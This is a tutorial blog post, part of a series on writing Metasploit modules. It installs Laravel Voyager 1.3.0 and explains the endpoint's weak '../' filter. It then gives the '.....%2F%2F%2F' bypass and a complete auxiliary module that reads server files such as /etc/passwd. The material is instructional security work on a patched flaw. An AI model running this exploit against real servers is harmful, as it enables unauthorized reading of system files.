Technique to exploit Web security vulnerabilities on Metasploit Framework (P3)

Monday, 14/09/2020

Tram Ho

Continuing unfinished knowledge in part 2 . Today we will continue to work together to write a simple exploit code on Metasploit Framework.

7. Script to exploit Path traversal vulnerability in CMS Voyager Laravel

Since the goal is to write simple exploit code, the initial selection of the testing platform is quite important. We try to choose the vulnerabilities that are easy to exploit, the shortest path to exploit and the least laborious. Here I choose Path traversal vulnerability in CMS Voyager Laravel because it fully meets the above requirements. The level of exploitation is easy as well as it is easy to visualize the effectiveness of the code. This vulnerability was found by a colleague and publicized here

7.1 Set up the test environment

Voyager is an open source web application built on PHP’s Laravel Framework. Voyager is open source and currently in development at https://github.com/the-control-group/voyager . The application allows users to create a system administration page quickly and easily.

To be able to install Voyager, we need to install PHP and Laravel first. The following section shows how to install PHP and Laravel on a Centos 7.0 server environment

First use the following command to install the Apache web server:

<span class="token comment"># yum install httpd -y</span>

1 2	<span class="token comment"># yum install httpd -y</span>

After the installation is complete, start Apache and let Apache start with the system:

<span class="token comment"># systemctl start httpd</span>

1 2	<span class="token comment"># systemctl start httpd</span>

Set the rules for the firewall so that Apache can work:

<span class="token comment"># firewall-cmd --permanent --add-port=80/tcp</span>
<span class="token comment"># firewall-cmd --permanent --add-port=443/tcp</span>

# firewall-cmd --permanent --add-port=80/tcp

# firewall-cmd --permanent --add-port=443/tcp

Mysql database management system installation:

<span class="token comment"># yum install mariadb-server php-mysql</span>
<span class="token comment"># systemctl start mariadb.service</span>

# yum install mariadb-server php-mysql

# systemctl start mariadb.service

Install PHP 7.2

<span class="token comment"># yum install yum-utils</span>
<span class="token comment"># yum-config-manager --enable remi-php72</span>

# yum install yum-utils

# yum-config-manager --enable remi-php72

Install “composer” and “Laravel”:

<span class="token comment"># curl -sS https://getcomposer.org/installer | php</span>
<span class="token comment"># mv composer.phar /usr/bin/composer</span>

# curl -sS https://getcomposer.org/installer | php

# mv composer.phar /usr/bin/composer

After you have built the necessary environment on the server. We proceed to install Voyager version 1.3.0:

<span class="token comment"># composer require tcg/voyager:1.3.0</span>

1 2	<span class="token comment"># composer require tcg/voyager:1.3.0</span>

Create a database with Mysql then edit the file “.env” at the directory path: “/var/www/html/voyager/.env” and add the following configuration parameters:

DB_HOST=localhost
DB_DATABASE=voyager
DB_USERNAME=voyager
DB_PASSWORD=secret

DB_HOST=localhost

DB_DATABASE=voyager

DB_USERNAME=voyager

DB_PASSWORD=secret

Start the process of installing and configuring Voyager automatically:

# cd /var/www/html/voyager/
# php artisan voyager:install

# cd /var/www/html/voyager/

# php artisan voyager:install

After performing the above steps, Voyager was successfully installed on the server. Use the following command to be able to run the service. Add the parameter “–host = 0.0.0.0” so that Voyager is accessible from external ip addresses.

# php artisan serve --host=0.0.0.0

1 2	# php artisan serve --host=0.0.0.0

By default Voyager will run on port 8000. You can use parameter “–port = [port]” to change the port that the Voyager service listens to.

After running the program, access http: // ip: 8000 / admin to access Voyager’s admin page:

7.2 Exploiting Path traversal vulnerability in CMS Voyager Laravel with “manual”

Let’s take a look at the source code of the API:

<span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">assets</span> <span class="token punctuation">(</span> Request <span class="token variable">$request</span> <span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token variable">$path</span> <span class="token operator">=</span> Str <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token function">start</span> <span class="token punctuation">(</span> <span class="token function">str_replace</span> <span class="token punctuation">(</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'../'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'./'</span> <span class="token punctuation">]</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token function">urldecode</span> <span class="token punctuation">(</span> <span class="token variable">$request</span> <span class="token operator">-</span> <span class="token operator">&gt;</span> <span class="token property">path</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'/'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span>
    <span class="token variable">$path</span> <span class="token operator">=</span> <span class="token function">base_path</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'vendor/tcg/voyager/publishable/assets'</span> <span class="token punctuation">.</span> <span class="token variable">$path</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span>
     <span class="token keyword">if</span> <span class="token punctuation">(</span> File <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token function">exists</span> <span class="token punctuation">(</span> <span class="token variable">$path</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$mime</span> <span class="token operator">=</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span> Str <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token function">endsWith</span> <span class="token punctuation">(</span> <span class="token variable">$path</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'.js'</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token variable">$mime</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'text/javascript'</span> <span class="token punctuation">;</span>
            <span class="token punctuation">}</span> <span class="token keyword">elseif</span> <span class="token punctuation">(</span> Str <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token function">endsWith</span> <span class="token punctuation">(</span> <span class="token variable">$path</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'.css'</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token variable">$mime</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'text/css'</span> <span class="token punctuation">;</span>
            <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
                <span class="token variable">$mime</span> <span class="token operator">=</span> File <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token function">mimeType</span> <span class="token punctuation">(</span> <span class="token variable">$path</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span>
            <span class="token punctuation">}</span>

public function assets ( Request $request )

{

$path = Str : : start ( str_replace ( [ '../' , './' ] , '' , urldecode ( $request - > path ) ) , '/' ) ;

$path = base_path ( 'vendor/tcg/voyager/publishable/assets' . $path ) ;

if ( File : : exists ( $path ) ) {

$mime = '' ;

if ( Str : : endsWith ( $path , '.js' ) ) {

$mime = 'text/javascript' ;

} elseif ( Str : : endsWith ( $path , '.css' ) ) {

$mime = 'text/css' ;

} else {

$mime = File : : mimeType ( $path ) ;

}

In applications built on Voyager there is an API ” GET / admin / voyager-assets? Path = [….] “. With the parameter “path” is the path to the resource files such as images, javascript, files … of the application.

The code above tried to counter “Path traversal” by removing the strings “../” and “./” but obviously not thoroughly. An attacker can easily bypass using the string “…..% 2F% 2F% 2F”. From there you can exploit “Path traversal” and read the system files on the server:

The above vulnerability has been fixed since versions> 1.3.0. Details about the patch here :

7.3 Exploiting Path traversal vulnerability in CMS Voyager Laravel using Metasploit Framework

First, you need to declare the information about the vulnerability and necessary parameters:

<span class="token keyword">class</span> <span class="token class-name">MetasploitModule</span> <span class="token operator">&lt;</span> <span class="token constant">Msf</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Auxiliary</span>
    <span class="token keyword">include</span> <span class="token constant">Msf</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Exploit</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Remote</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">HttpClient</span>
    <span class="token keyword">include</span> <span class="token constant">Msf</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Auxiliary</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Report</span>
    <span class="token keyword">include</span> <span class="token constant">Msf</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Auxiliary</span> <span class="token punctuation">:</span> <span class="token punctuation">:</span> <span class="token constant">Scanner</span>
  
    <span class="token keyword">def</span> <span class="token method-definition"><span class="token function">initialize</span></span> <span class="token punctuation">(</span> info <span class="token operator">=</span> <span class="token punctuation">{</span> <span class="token punctuation">}</span> <span class="token punctuation">)</span>
      <span class="token keyword">super</span> <span class="token punctuation">(</span> update_info <span class="token punctuation">(</span> info <span class="token punctuation">,</span>
        <span class="token string">'Name'</span>        <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token string">'Laravel Voyager Directory Traversal'</span> <span class="token punctuation">,</span>
        <span class="token string">'Description'</span> <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token string">%q{
          This module exploits a directory traversal vulnerability which
          exists in Laravel Voyager &lt; 1.3.0.
        }</span> <span class="token punctuation">,</span>
        <span class="token string">'References'</span>  <span class="token operator">=</span> <span class="token operator">&gt;</span>      <span class="token punctuation">[</span>
          <span class="token punctuation">]</span> <span class="token punctuation">,</span>
        <span class="token string">'Author'</span>      <span class="token operator">=</span> <span class="token operator">&gt;</span>         <span class="token punctuation">[</span>
          <span class="token punctuation">]</span> <span class="token punctuation">,</span>
        <span class="token string">'DisclosureDate'</span> <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token string">'Aug 03 2019'</span> <span class="token punctuation">,</span>
        <span class="token string">'License'</span>     <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token constant">MSF_LICENSE</span>
      <span class="token punctuation">)</span> <span class="token punctuation">)</span>

class MetasploitModule < Msf : : Auxiliary

include Msf : : Exploit : : Remote : : HttpClient

include Msf : : Auxiliary : : Report

include Msf : : Auxiliary : : Scanner

def initialize ( info = { } )

super ( update_info ( info ,

'Name' = > 'Laravel Voyager Directory Traversal' ,

'Description' = > %q{

This module exploits a directory traversal vulnerability which

exists in Laravel Voyager < 1.3.0.

} ,

'References' = > [

] ,

'Author' = > [

] ,

'DisclosureDate' = > 'Aug 03 2019' ,

'License' = > MSF_LICENSE

) )

The following two statements are used to declare two parameters required for an extraction. “FILEPATH” is the absolute path of the file on the server. “DEPTH” is the parameter that determines the rank of the current Voyager directory. The default is set to 10:

  register_options <span class="token punctuation">(</span>
      <span class="token punctuation">[</span>
        <span class="token constant">OptString</span> <span class="token punctuation">.</span> <span class="token keyword">new</span> <span class="token punctuation">(</span> <span class="token string">'FILEPATH'</span> <span class="token punctuation">,</span> <span class="token punctuation">[</span> <span class="token boolean">true</span> <span class="token punctuation">,</span> <span class="token string">"The path to the file to read"</span> <span class="token punctuation">,</span> <span class="token string">'/etc/passwd'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">,</span>
        <span class="token constant">OptInt</span> <span class="token punctuation">.</span> <span class="token keyword">new</span> <span class="token punctuation">(</span> <span class="token string">'DEPTH'</span> <span class="token punctuation">,</span> <span class="token punctuation">[</span> <span class="token boolean">true</span> <span class="token punctuation">,</span> <span class="token string">'Depth for Path Traversal'</span> <span class="token punctuation">,</span> <span class="token number">10</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span>
      <span class="token punctuation">]</span> <span class="token punctuation">)</span>
  <span class="token keyword">end</span>

register_options (

[

OptString . new ( 'FILEPATH' , [ true , "The path to the file to read" , '/etc/passwd' ] ) ,

OptInt . new ( 'DEPTH' , [ true , 'Depth for Path Traversal' , 10 ] )

] )

end

Next is the code used to send requests to the server and exploit the vulnerability:

<span class="token keyword">def</span> <span class="token method-definition"><span class="token function">run_host</span></span> <span class="token punctuation">(</span> ip <span class="token punctuation">)</span>
      filename <span class="token operator">=</span> datastore <span class="token punctuation">[</span> <span class="token string">'FILEPATH'</span> <span class="token punctuation">]</span>
      traversal <span class="token operator">=</span> <span class="token string">'.....%2F%2F%2F'</span> <span class="token operator">*</span> datastore <span class="token punctuation">[</span> <span class="token string">'DEPTH'</span> <span class="token punctuation">]</span> <span class="token operator">&lt;</span> <span class="token operator">&lt;</span> filename
  
      res <span class="token operator">=</span> send_request_raw <span class="token punctuation">(</span> <span class="token punctuation">{</span>
        <span class="token string">'method'</span> <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token string">'GET'</span> <span class="token punctuation">,</span>
        <span class="token string">'uri'</span>    <span class="token operator">=</span> <span class="token operator">&gt;</span> normalize_uri <span class="token punctuation">(</span> target_uri <span class="token punctuation">.</span> path <span class="token punctuation">,</span> <span class="token string">"admin/voyager-assets?path= <span class="token interpolation"><span class="token delimiter tag">#{</span> traversal <span class="token delimiter tag">}</span></span> "</span> <span class="token punctuation">)</span> <span class="token punctuation">,</span>
        <span class="token string">'vars_get'</span> <span class="token operator">=</span> <span class="token operator">&gt;</span> <span class="token punctuation">{</span> <span class="token string">'path'</span> <span class="token operator">=</span> <span class="token operator">&gt;</span> traversal <span class="token punctuation">}</span>
      <span class="token punctuation">}</span> <span class="token punctuation">)</span>

      <span class="token keyword">unless</span> res <span class="token operator">&amp;&amp;</span> res <span class="token punctuation">.</span> code <span class="token operator">==</span> <span class="token number">200</span>
        print_error <span class="token punctuation">(</span> <span class="token string">'Nothing was downloaded'</span> <span class="token punctuation">)</span>
        <span class="token keyword">return</span>
<span class="token keyword">end</span>
      vprint_good <span class="token punctuation">(</span> <span class="token string">" <span class="token interpolation"><span class="token delimiter tag">#{</span> peer <span class="token delimiter tag">}</span></span> - n <span class="token interpolation"><span class="token delimiter tag">#{</span> res <span class="token punctuation">.</span> body <span class="token delimiter tag">}</span></span> "</span> <span class="token punctuation">)</span>
      path <span class="token operator">=</span> store_loot <span class="token punctuation">(</span>
        filename <span class="token punctuation">,</span>
        <span class="token string">'text/plain'</span> <span class="token punctuation">,</span>
        ip <span class="token punctuation">,</span>
        res <span class="token punctuation">.</span> body <span class="token punctuation">,</span>
        filename
      <span class="token punctuation">)</span>
      print_good <span class="token punctuation">(</span> <span class="token string">"File saved in: <span class="token interpolation"><span class="token delimiter tag">#{</span> path <span class="token delimiter tag">}</span></span> "</span> <span class="token punctuation">)</span>
    <span class="token keyword">end</span>

def run_host ( ip )

filename = datastore [ 'FILEPATH' ]

traversal = '.....%2F%2F%2F' * datastore [ 'DEPTH' ] < < filename

res = send_request_raw ( {

'method' = > 'GET' ,

'uri' = > normalize_uri ( target_uri . path , "admin/voyager-assets?path= #{ traversal } " ) ,

'vars_get' = > { 'path' = > traversal }

} )

unless res && res . code == 200

print_error ( 'Nothing was downloaded' )

return

end

vprint_good ( " #{ peer } - n #{ res . body } " )

path = store_loot (

filename ,

'text/plain' ,

ip ,

res . body ,

filename

)

print_good ( "File saved in: #{ path } " )

end

Since the vulnerability does not require authentication and the testing platform does not use minimum security methods, it is relatively easy to write exploit code.

7.3.1 Use of exploit codes

Save the exploit code to the Metasploit Framework installation directory ” /usr/share/metasploit-framework/modules/exploits/myexploits/voyager.rb “. Then start Voyager. Set the required parameters for the extraction:

After extraction, Metasploit Framework will return the path to save the file. Use the cat command to view the file’s contents:

8. Summary

Through here, we have successfully built a simple exploit code on Metasploit Framework. In the next part, I will present more difficult mining codes, longer and more complex mining paths. Thank you all for reading, see you in part 4.

References :

https://github.com/rapid7/metasploit-framework/wiki

https://www.offensive-security.com/metasploit-unleashed/

Thank to doandinhlinh

Share the news now

Source : Viblo

Technique to exploit Web security vulnerabilities on Metasploit Framework (P3)

7. Script to exploit Path traversal vulnerability in CMS Voyager Laravel

8. Summary

TikTok becomes the second largest social platform in South Africa

The fastest depreciating after 9 months of launch, iPhone 14 Pro Max continues to break the bottom in Vietnam

Beginner's guide to R: Introduction

10 essential SublimeText plugins for JavaScript developers